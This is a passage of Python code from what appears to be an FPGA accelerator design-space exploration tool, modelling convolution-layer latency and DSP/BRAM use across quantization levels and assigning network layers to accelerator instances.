tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
if comp_mode==2:
return math.ceil(input_params[2]*tci*tri/max(min(4,tri),2))*(quant/16)
else:
return math.ceil(input_params[2]*tci*tri/max(min(4,input_params[6]),2))*(quant/16)
def read_we_lat(comp_mode,input_params,net_struct,quant=16):
if comp_mode==2:
#print('weight loading',input_params[2]*input_params[3]*net_struct[3] )
return input_params[2]*input_params[3]*net_struct[3]*(quant/16)
else:
return math.ceil(input_params[2]*input_params[3]*net_struct[3]*net_struct[3]/max(min(4,input_params[6]),2))*(quant/16)
def dw_read_we_lat(comp_mode,input_params,net_struct,quant=16):
if input_params[3] !=1:
raise Exception('input channel & corresponding tiling needs to be set as one for dw conv')
if comp_mode==1:
return input_params[2]*input_params[3]*net_struct[3]*(quant/16)
else:
return math.ceil(input_params[2]*input_params[3]*net_struct[3]*net_struct[3]/max(min(4,input_params[6]),2))*(quant/16)
def write_ofmap(comp_mode,input_params,net_struct,quant=16):
if comp_mode==2:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[4]),2))
clear_buffer=input_params[1]*input_params[2]*(input_params[0]/input_params[4])
else:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[6]),2))
clear_buffer=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
#print('clear output', read_write_1, clear_buffer)
return (read_write_1+clear_buffer)*(quant/16)
def dw_write_ofmap(comp_mode,input_params,net_struct,quant=16):
if comp_mode==1:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[4]),2))
clear_buffer=input_params[1]*input_params[2]*(input_params[0]/input_params[4])
else:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[6]),2))
clear_buffer=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
#print('clear output', read_write_1, clear_buffer)
return (read_write_1+clear_buffer)*(quant/16)
def combined_latency(comp_mode, input_params,net_struct,quant=16):
outer_loop_tc=net_struct[2]/input_params[1]
outer_loop_tr=net_struct[2]/input_params[0]
outer_loop_tm=net_struct[1]/input_params[2]
outer_loop_tn=net_struct[0]/input_params[3]
read_if_we_comp=max(comp_engine_lat(comp_mode,input_params,net_struct), read_if_lat(comp_mode,input_params,net_struct,quant=quant))+read_we_lat(comp_mode,input_params,net_struct,quant=quant)
read_if_we_comp_tn=read_if_we_comp*outer_loop_tn
inner_lat=write_ofmap(comp_mode,input_params,net_struct,quant=quant)+read_if_we_comp_tn
return inner_lat*outer_loop_tc*outer_loop_tr*outer_loop_tm
def dw_combined_latency(comp_mode, input_params,net_struct,quant=16):
outer_loop_tc=net_struct[2]/input_params[1]
outer_loop_tr=net_struct[2]/input_params[0]
outer_loop_tm=net_struct[1]/input_params[2]
read_if_we_comp=max(dw_comp_engine_lat(comp_mode,input_params,net_struct),\
dw_read_if_lat(comp_mode,input_params,net_struct,quant=quant))+\
dw_read_we_lat(comp_mode,input_params,net_struct,quant=quant)+\
dw_write_ofmap(comp_mode,input_params,net_struct,quant=quant)
return outer_loop_tc*outer_loop_tr*outer_loop_tm*read_if_we_comp
def resource_consumption(comp_mode,input_params,net_struct,dw=False,quant=16):
max_bank_size=1125*16
if not dw:
if comp_mode==0:
#TODO: cases using completely LUT
if quant > 16:
dsp=input_params[6]*2
elif quant <=16 and quant > 8:
dsp=input_params[6]
elif quant <= 8:
dsp=max(1,input_params[6]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tri*tci*(input_params[3]/input_params[7])
input_bram=input_params[7]*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
output_bram=input_params[6]*math.ceil(output_bank_size*quant/max_bank_size)
#TODO: in output channel tiling only; input channel is still tiled, fix in auto_runner side
# separate the parallel choice for kernels input_channel and output_channel
weight_bank_size=net_struct[3]*net_struct[3]*input_params[3]*(input_params[2]/input_params[6])
weight_bram=input_params[6]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram
elif comp_mode==1:
if quant > 16:
dsp=input_params[6]*input_params[7]*2
elif quant <=16 and quant > 8:
dsp=input_params[6]*input_params[7]
elif quant <= 8:
dsp=max(1,input_params[6]*input_params[7]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tri*tci*(input_params[3]/input_params[7])
input_bram=input_params[7]*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
output_bram=input_params[6]*math.ceil(output_bank_size*quant/max_bank_size)
weight_bank_size=net_struct[3]*net_struct[3]*(input_params[3]/input_params[7])*(input_params[2]/input_params[6])
weight_bram=input_params[6]*input_params[7]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram
elif comp_mode==2:
#TODO: adding additional adder tree cost
if quant > 16:
dsp=input_params[4]*2
elif quant <=16 and quant > 8:
dsp=input_params[4]
elif quant <= 8:
dsp=max(1,input_params[4]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tci*input_params[3]
input_bram=tri*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[1]*input_params[2]
output_bram=input_params[4]*math.ceil(output_bank_size*quant/max_bank_size)
weight_bank_size=net_struct[3]*input_params[2]*input_params[3]
weight_bram=net_struct[3]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram+weight_bram
else:
if comp_mode==0:
#TODO: cases using completely LUT
if quant > 16:
dsp=input_params[6]*2
elif quant <=16 and quant > 8:
dsp=input_params[6]
elif quant <= 8:
dsp=max(1,input_params[6]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tri*tci*(input_params[2]/input_params[6])
input_bram=input_params[6]*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
output_bram=input_params[6]*math.ceil(output_bank_size*quant/max_bank_size)
#TODO: in output channel tiling only; input channel is still tiled, fix in auto_runner side
# separate the parallel choice for kernels input_channel and output_channel
weight_bank_size=net_struct[3]*net_struct[3]*(input_params[2]/input_params[6])
weight_bram=input_params[6]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram
elif comp_mode==1:
if quant > 16:
dsp=input_params[4]*2
elif quant <=16 and quant > 8:
dsp=input_params[4]
elif quant <= 8:
dsp=max(1,input_params[4]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tci*input_params[3]
input_bram=tri*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[1]*input_params[2]
output_bram=input_params[4]*math.ceil(output_bank_size*quant/max_bank_size)
weight_bank_size=net_struct[3]*input_params[2]
weight_bram=net_struct[3]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram+weight_bram
return (dsp,total_bram)
def sys_latency(input_params_set,net_struct,dw,accelerator_alloc,accelerator_wise_budget):
#input_params_set
#[[comp_mode,fw,fh,of,if,f(fw),f(fh),f(of),f(if),quant]...]
#net_struct
#[[]....]
#accelerator_alloc
#{layer_num:accelerator_num}
latency_break_down={}
layer_wise_break_down_to_accel={}
layer_wise_break_down=[]
for i in input_params_set.keys():
latency_break_down[i]=0
layer_wise_break_down_to_accel[i]=[]
for i, layer_struct in enumerate(net_struct):
input_params=input_params_set[accelerator_alloc[i]]
if dw[i]:
tmp_lat=dw_combined_latency(input_params[0],input_params[1:9],layer_struct,quant=input_params[-1])
latency_break_down[accelerator_alloc[i]]+=tmp_lat
layer_wise_break_down_to_accel[accelerator_alloc[i]].append(tmp_lat)
layer_wise_break_down.append(tmp_lat)
else:
tmp_lat=combined_latency(input_params[0],input_params[1:9],layer_struct,quant=input_params[-1])
latency_break_down[accelerator_alloc[i]]+=tmp_lat
layer_wise_break_down_to_accel[accelerator_alloc[i]].append(tmp_lat)
layer_wise_break_down.append(tmp_lat)
bottleneck_latency=0
for i in latency_break_down.keys():
if latency_break_down[i] >bottleneck_latency:
bottleneck_latency=latency_break_down[i]
return bottleneck_latency, latency_break_down,layer_wise_break_down_to_accel,layer_wise_break_down
def sys_consumption(input_params_set,net_struct,dw,accelerator_alloc,accelerator_wise_budget,platform_specs):
#input_params_set
#[[comp_mode,fw,fh,of,if,f(fw),f(fh),f(of),f(if),quant]...]
#net_struct
#[[]....]
#accelerator_alloc
#{layer_num:accelerator_num}
consumption_breakdown={}
for i in input_params_set.keys():
consumption_breakdown[i]=[0,0]
for i, layer_struct in enumerate(net_struct):
input_params=input_params_set[accelerator_alloc[i]]
consumption_breakdown[accelerator_alloc[i]]= [max(consumption_breakdown[accelerator_alloc[i]][0],\
resource_consumption(input_params[0],input_params[1:9],\
layer_struct,dw=dw[i],quant=input_params[-1])[0]),\
max(consumption_breakdown[accelerator_alloc[i]][1],\
resource_consumption(input_params[0],input_params[1:9],\
layer_struct,dw=dw[i],quant=input_params[-1])[1])]
total_dsp_used=0
total_bram_used=0
for i in consumption_breakdown.keys():
total_dsp_used+=consumption_breakdown[i][0]
total_bram_used+=consumption_breakdown[i][1]
if total_dsp_used>platform_specs['dsp']:
raise Exception('dsp limit exceeded')
elif total_bram_used>platform_specs['bram']:
raise Exception('bram exceeded')
for i in accelerator_wise_budget.keys():
if consumption_breakdown[i][0] > accelerator_wise_budget[i]['dsp']:
print("Warning: accelerator "+str(i)+" dsp budget exceeded")
elif consumption_breakdown[i][1]> accelerator_wise_budget[i]['bram']:
print("Warning: accelerator "+str(i)+" bram budget exceeded")
return (total_dsp_used,total_bram_used), consumption_breakdown
def allocate_layers(net_struct,quant_list,dw,platform_specs,layer_block_corr,cifar=True,edd=False,channel_part=False):
dw_quantization_bins={}
std_quantization_bins={}
accelerator_alloc={}
accelerator_wise_budget={}
accelerator_types=[]
for i, layer_struct in enumerate(net_struct):
if dw[i]:
if quant_list[i] not in dw_quantization_bins.keys():
#initiate the bins
dw_quantization_bins[quant_list[i]]=[i]
else:
#add layers to the corresponding bins
dw_quantization_bins[quant_list[i]].append(i)
else:
if quant_list[i] not in std_quantization_bins.keys():
#initiate the bins
std_quantization_bins[quant_list[i]]=[i]
else:
#add layers to the corresponding bins
std_quantization_bins[quant_list[i]].append(i)
if not channel_part:
if cifar:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if net_struct[layer][2]>=16:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
else:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if net_struct[layer][2]>=16:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
else:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
else:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if net_struct[layer][2]>=28:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
else:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if net_struct[layer][2]>=28:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
else:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
else:
#applies specifically to Yonggan's space
if not edd:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1] or\
layer in layer_block_corr[2] or layer in layer_block_corr[3] or\
layer in layer_block_corr[4]:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
elif layer in layer_block_corr[5] or layer in layer_block_corr[6] or\
layer in layer_block_corr[7] or layer in layer_block_corr[8]:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
elif layer in layer_block_corr[9] or layer in layer_block_corr[10] or\
layer in layer_block_corr[11] or layer in layer_block_corr[12]:
if "a2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a2"+"q"+str(quant_bit))
accelerator_alloc[layer]="a2"+"q"+str(quant_bit)
elif layer in layer_block_corr[13] or layer in layer_block_corr[14] or\
layer in layer_block_corr[15] or layer in layer_block_corr[16]:
if "a3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a3"+"q"+str(quant_bit))
accelerator_alloc[layer]="a3"+"q"+str(quant_bit)
elif layer in layer_block_corr[17] or layer in layer_block_corr[18] or\
layer in layer_block_corr[19] or layer in layer_block_corr[20] or\
layer in layer_block_corr[21]:
if "a4"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a4"+"q"+str(quant_bit))
accelerator_alloc[layer]="a4"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1] or\
layer in layer_block_corr[2] or layer in layer_block_corr[3] or\
layer in layer_block_corr[4]:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
elif layer in layer_block_corr[5] or layer in layer_block_corr[6] or\
layer in layer_block_corr[7] or layer in layer_block_corr[8]:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
elif layer in layer_block_corr[9] or layer in layer_block_corr[10] or\
layer in layer_block_corr[11] or layer in layer_block_corr[12]:
if "dwa2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa2"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa2"+"q"+str(quant_bit)
elif layer in layer_block_corr[13] or layer in layer_block_corr[14] or\
layer in layer_block_corr[15] or layer in layer_block_corr[16]:
if "dwa3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa3"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa3"+"q"+str(quant_bit)
elif layer in layer_block_corr[17] or layer in layer_block_corr[18] or\
layer in layer_block_corr[19] or layer in layer_block_corr[20] or\
layer in layer_block_corr[21]:
if "dwa4"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa4"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa4"+"q"+str(quant_bit)
else:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1] or\
layer in layer_block_corr[2] or layer in layer_block_corr[3]:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
elif layer in layer_block_corr[4] or layer in layer_block_corr[5]or\
layer in layer_block_corr[6] or layer in layer_block_corr[7]:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
elif layer in layer_block_corr[8] or layer in layer_block_corr[9]or\
layer in layer_block_corr[10] or layer in layer_block_corr[11]:
if "a2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a2"+"q"+str(quant_bit))
accelerator_alloc[layer]="a2"+"q"+str(quant_bit)
elif layer in layer_block_corr[12] or layer in layer_block_corr[13]or\
layer in layer_block_corr[14] or layer in layer_block_corr[15]:
if "a3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a3"+"q"+str(quant_bit))
accelerator_alloc[layer]="a3"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1]or\
layer in layer_block_corr[2] or layer in layer_block_corr[3]:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
elif layer in layer_block_corr[4] or layer in layer_block_corr[5]or\
layer in layer_block_corr[6] or layer in layer_block_corr[7]:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
elif layer in layer_block_corr[8] or layer in layer_block_corr[9]or\
layer in layer_block_corr[10] or layer in layer_block_corr[11]:
if "dwa2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa2"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa2"+"q"+str(quant_bit)
elif layer in layer_block_corr[12] or layer in layer_block_corr[13]or\
layer in layer_block_corr[14] or layer in layer_block_corr[15]:
if "dwa3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa3"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa3"+"q"+str(quant_bit)
# print("="*20)
# print(len(net_struct))
# print(len(list(accelerator_alloc.keys())))
# print(accelerator_alloc)
# print("="*20)
#return None
return accelerator_alloc, accelerator_types, accelerator_wise_budget
def cifar_convert_to_layers(block_info,quant_list,cifar=True,edd=False):
#TODO: include EDD cases
if cifar:
output_dim=[32]+[32]*4+[16]*4+[8]*4+[8]*4+[4]*4+[4]
num_layer_list = [1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1]
#currently only support 1
#num_layer_list = [1, 4, 4, 4, 4, 4, 1]
#num_channel_list = [16, 24, 32, 64, 112, 184, 352]
num_channel_list = [16]+[24]*4+[32]*4+[64]*4+[112]*4+[192]*4+[352]
stride_list = [1, 1,1,1,1, 2,1,1,1, 2,1,1,1, 1,1,1,1, 2,1,1,1, 1]
else:
output_dim=[112]+[56]*4+[28]*4+[14]*4+[14]*4+[7]*4+[7]
num_layer_list = [1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1]
#num_layer_list = [1, 4, 4, 4, 4, 4, 1]
#num_channel_list = [16, 24, 32, 64, 112, 184, 352]
num_channel_list = [16]+[24]*4+[32]*4+[64]*4+[112]*4+[192]*4+[352]
stride_list = [1, 2,1,1,1, 2,1,1,1, 2,1,1,1, 1,1,1,1, 2,1,1,1, 1]
if edd:
output_dim=[56,28,28,28,28,14,14,14,14,14,14,7,7,7,7,7]
num_layer_list= [1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1]
num_channel_list =[32,48,48,48, 96,96,96,96, 128,128,128,256, 256,256,256,320]
stride_list=[2,2,1,1, 1,2,1,1, 1,1,1,2, 1,1,1,1]
net_struct=[]
dw=[]
layer_wise_quant=[]
layer_block_corr={}
for i in range(sum(num_layer_list)):
layer_block_corr[i]=[]
layer_num=0
for i, rep_times in enumerate(num_layer_list):
if "g" not in block_info[i] and block_info[i] != "skip":
k=int(block_info[i][1])
e=int(block_info[i][4])
if num_layer_list[i]==1:
if i==0:
#TODO: confirm if the layer dimension is right
net_struct.append([16,16*e,output_dim[0],1,1])
net_struct.append([1,16*e,output_dim[0],k,1])
net_struct.append([16*e,16,output_dim[0],1,1])
dw+=[False,True,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit]
layer_block_corr[0]+=[0,1,2]
layer_num+=3
else:
net_struct.append([num_channel_list[i-1],num_channel_list[i-1]*e,output_dim[i-1],1,stride_list[i]])
net_struct.append([1,num_channel_list[i-1]*e,output_dim[i],k,1])
net_struct.append([num_channel_list[i-1]*e,num_channel_list[i],output_dim[i],1,1])
dw+=[False,True,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit]
layer_block_corr[i]+=[layer_num,layer_num+1,layer_num+2]
layer_num+=3
else:
raise Exception('Currently not supporting repetive block info input')
elif "g" in block_info[i]:
k=int(block_info[i][1])
e=int(block_info[i][4])
if num_layer_list[i]==1:
if i==0:
#TODO: confirm if the layer dimension is right
net_struct.append([16/2,16*e/2,output_dim[0],1,1])
net_struct.append([16/2,16*e/2,output_dim[0],1,1])
net_struct.append([1,16*e,output_dim[0],k,1])
net_struct.append([16*e/2,16/2,output_dim[0],1,1])
net_struct.append([16*e/2,16/2,output_dim[0],1,1])
dw+=[False,False,True,False,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit,quant_bit,quant_bit]
layer_block_corr[0]+=[0,1,2,3,4]
layer_num+=5
else:
net_struct.append([num_channel_list[i-1]/2,num_channel_list[i-1]*e/2,output_dim[i-1],1,stride_list[i]])
net_struct.append([num_channel_list[i-1]/2,num_channel_list[i-1]*e/2,output_dim[i-1],1,stride_list[i]])
net_struct.append([1,num_channel_list[i-1]*e,output_dim[i],k,1])
net_struct.append([num_channel_list[i-1]*e/2,num_channel_list[i]/2,output_dim[i],1,1])
net_struct.append([num_channel_list[i-1]*e/2,num_channel_list[i]/2,output_dim[i],1,1])
dw+=[False,False,True,False,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit,quant_bit,quant_bit]
layer_block_corr[i]+=[layer_num,layer_num+1,layer_num+2,layer_num+3,layer_num+4]
layer_num+=5
else:
raise Exception('Currently not supporting repetive block info input')
return net_struct,dw,layer_wise_quant,layer_block_corr
########################
##DNA specific utilities
########################
# def cifar_convert_to_layers(block_info,quant_list,cifar=True,edd=False):
# #TODO: include EDD cases
# if cifar:
# output_dim=[32]+[32]*4+[16]*4+[8]*4+[8]*4+[4]*4+[4]
# num_layer_list = [1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1]
# #currently only support 1
# #num_layer_list = [1, 4, 4, 4, 4, 4, 1]
# #num_channel_list = [16, 24, 32, 64, 112, 184, 352]
# num_channel_list = [16]+[24]*4+[32]*4+[64]*4+[112]*4+[192]*4+[352]
# stride_list = [1, 1,1,1,1, 2,1,1,1, 2,1,1,1, 1,1,1,1, 2,1,1,1, 1]
# else:
# output_dim=[112]+[56]*4+[28]*4+[14]*4+[14]*4+[7]*4+[7]
# num_layer_list = [1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1]
# #num_layer_list = [1, 4, 4, 4, 4, 4, 1]
# #num_channel_list = [16, 24, 32, 64, 112, 184, 352]
# num_channel_list = [16]+[24]*4+[32]*4+[64]*4+[112]*4+[192]*4+[352]
# stride_list = [1, 2,1,1,1, 2,1,1,1, 2,1,1,1, 1,1,1,1, 2,1,1,1, 1]
# if edd:
# output_dim=[56,28,28,28,28,14,14,14,14,14,14,7,7,7,7,7]
# num_layer_list= [1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1]
# num_channel_list =[32,48,48,48, 96,96,96,96, 128,128,128,256, 256,256,256,320]
# stride_list=[2,2,1,1, 1,2,1,1, 1,1,1,2, 1,1,1,1]
# net_struct=[]
# dw=[]
# layer_wise_quant=[]
# layer_block_corr={}
# for i in range(sum(num_layer_list)):
# layer_block_corr[i]=[]
# layer_num=0
# for i, rep_times in enumerate(num_layer_list):
# if "g" not in block_info[i] and block_info[i] != "skip":
# k=int(block_info[i][1])
# e=int(block_info[i][4])
# if num_layer_list[i]==1:
# if i==0:
# #TODO: confirm if the layer dimension is right
# net_struct.append([16,16*e,output_dim[0],1,1])
# net_struct.append([1,16*e,output_dim[0],k,1])
# net_struct.append([16*e,16,output_dim[0],1,1])
# dw+=[False,True,False]
# quant_bit=quant_list.pop(0)
# layer_wise_quant+=[quant_bit,quant_bit,quant_bit]
# layer_block_corr[0]+=[0,1,2]
# layer_num+=3
# else:
# net_struct.append([num_channel_list[i-1],num_channel_list[i-1]*e,output_dim[i],1,stride_list[i]])
# net_struct.append([1,num_channel_list[i-1]*e,output_dim[i],k,1])
# net_struct.append([num_channel_list[i-1]*e,num_channel_list[i],output_dim[i],1,1])
# dw+=[False,True,False]
# quant_bit=quant_list.pop(0)
# layer_wise_quant+=[quant_bit,quant_bit,quant_bit]
# layer_block_corr[i]+=[layer_num,layer_num+1,layer_num+2]
# layer_num+=3
# else:
# raise Exception('Currently not supporting repetive block info input')
# elif "g" in block_info[i]:
# k=int(block_info[i][1])
# e=int(block_info[i][4])
# if num_layer_list[i]==1:
# if i==0:
# #TODO: confirm if the layer dimension is right
# net_struct.append([16/2,16*e/2,output_dim[0],1,1])
# net_struct.append([16/2,16*e/2,output_dim[0],1,1])
# net_struct.append([1,16*e,output_dim[0],k,1])
# net_struct.append([16*e/2,16/2,output_dim[0],1,1])
# net_struct.append([16*e/2,16/2,output_dim[0],1,1])
# dw+=[False,False,True,False,False]
# quant_bit=quant_list.pop(0)
# layer_wise_quant+=[quant_bit,quant_bit,quant_bit,quant_bit,quant_bit]
# layer_block_corr[0]+=[0,1,2,3,4]
# layer_num+=5
# else:
# net_struct.append([num_channel_list[i-1]/2,num_channel_list[i-1]*e/2,output_dim[i],1,stride_list[i]])
# net_struct.append([num_channel_list[i-1]/2,num_channel_list[i-1]*e/2,output_dim[i],1,stride_list[i]])
# net_struct.append([1,num_channel_list[i-1]*e,output_dim[i],k,1])
# net_struct.append([num_channel_list[i-1]*e/2,num_channel_list[i]/2,output_dim[i],1,1])
# net_struct.append([num_channel_list[i-1]*e/2,num_channel_list[i]/2,output_dim[i],1,1])
# dw+=[False,False,True,False,False]
# quant_bit=quant_list.pop(0)
# layer_wise_quant+=[quant_bit,quant_bit,quant_bit,quant_bit,quant_bit]
# layer_block_corr[i]+=[layer_num,layer_num+1,layer_num+2,layer_num+3,layer_num+4]
# layer_num+=5
# else:
# raise Exception('Currently not supporting repetive block info input')
# return net_struct,dw,layer_wise_quant,layer_block_corr
def design_choice_gen(cifar=True,edd=False,channel_part=False):
#TODO: include imagenet cases
if not channel_part:
if cifar:
acc1_space={'comp_mode':[0,1,2],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
else:
acc1_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
#design_choices: {comp_mode:[0,1,2],fw:[2,4,6,8]...}
if edd:
